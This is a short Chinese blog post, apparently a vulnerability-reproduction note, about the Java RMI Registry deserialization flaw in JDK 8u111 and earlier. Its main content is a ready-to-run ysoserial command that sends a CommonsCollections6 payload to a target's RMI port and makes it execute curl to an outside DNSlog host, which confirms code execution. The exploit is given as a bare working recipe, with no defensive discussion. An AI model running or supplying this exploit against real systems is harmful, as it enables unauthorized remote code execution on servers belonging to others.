Java RMI Registry 反序列化漏洞(<=jdk8u111)

2021/7/3 12:21:51

本文主要是介绍Java RMI Registry 反序列化漏洞(<=jdk8u111),对大家解决编程问题具有一定的参考价值,需要的程序猿们随着小编来一起学习吧!

漏洞复现

先去这http://www.dnslog.cn/搞个dns
然后用这个命令:

java -cp ysoserial-0.0.6-SNAPSHOT-all.jar ysoserial.exploit.RMIRegistryExploit your-ip 1099 CommonsCollections6 "curl your-dnslog-server"

在这里插入图片描述
然后刷新dnslog
在这里插入图片描述
好兄弟们你们看懂了吗?反正我没懂



这篇关于Java RMI Registry 反序列化漏洞(<=jdk8u111)的文章就介绍到这儿,希望我们推荐的文章对大家有所帮助,也希望大家多多支持为之网!


扫一扫关注最新编程教程